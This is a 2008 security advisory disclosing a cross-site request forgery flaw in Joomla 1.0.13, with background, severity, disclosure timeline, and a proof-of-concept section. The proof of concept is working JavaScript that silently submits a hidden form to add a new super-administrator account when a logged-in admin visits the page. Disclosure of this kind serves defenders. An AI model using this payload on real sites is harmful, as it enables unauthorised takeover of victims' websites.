joomla1013-csrf.txt
Posted on 09 January 2008
Author: Jose Carlos Nieto. Date: Jan 08, 2008 Severity: Mild There exists a Cross Site Request Forgery security hole in Joomla 1.0.13. Background ========== *Joomla!* is a free <http://en.wikipedia.org/wiki/Free_software>, open source <http://en.wikipedia.org/wiki/Open_source_software> content management system <http://en.wikipedia.org/wiki/Content_management_system> for publishing content on the world wide web <http://en.wikipedia.org/wiki/World_wide_web> and intranets <http://en.wikipedia.org/wiki/Intranet>. Joomla! is licensed under the GPL <http://en.wikipedia.org/wiki/GNU_General_Public_License>, and is the result of a fork <http://en.wikipedia.org/wiki/Fork_%28software_development%29> of Mambo <http://en.wikipedia.org/wiki/Mambo_%28CMS%29>. Severity ======== Mild. It requires an administrator to be logged in and to be tricked into a specially crafted webpage. Summary ======= Joomla! has no CSRF protection. A malicious user can trick an administrator into viewing a specially crafted webpage containing an exploit, this exploit can execute (without permission) any command the administrator would normally execute, such as publish a content or even add a new administrator. Solution ======== This problem has no solution at this time. Disclosure timeline =================== Oct 18 2007 - Vulnerability found. Oct 18 2007 - Vulnerability reported to vendor. Oct 18 2007 - Answer from vendor. Jan 08 2008 - Advisory released. Proof of Concept ================ If a logged in administrator visits this page a new administrator will be added to the victim's Joomla powered website. ---- exploit code ---- <script type="text/javascript"> window.onload = function() { var url = "http://joomlasite.com/joomla/administrator/index2.php"; var gid = 25; var user = 'custom_username'; var pass = 'custom_password'; var email = 'joe_cool@example.com'; var param = { name: user, username: user, email: email, password: pass, password2: pass, gid: gid, block: 0, option: 'com_users', task: 'save', sendEmail: 1 }; var form = document.createElement('form'); form.action = url; form.method = 'post'; form.target = 'hidden'; form.style.display = 'none'; for (var i in param) { try { // ie var input = document.createElement('<input name="'+i+'">'); } catch(e) { // other browsers var input = document.createElement('input'); input.name = i; } input.setAttribute('value', param[i]); form.appendChild(input); } document.body.appendChild(form); form.submit(); } </script> <iframe name="hidden" style="display: none"></iframe> <img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg"> ---- exploit code ----
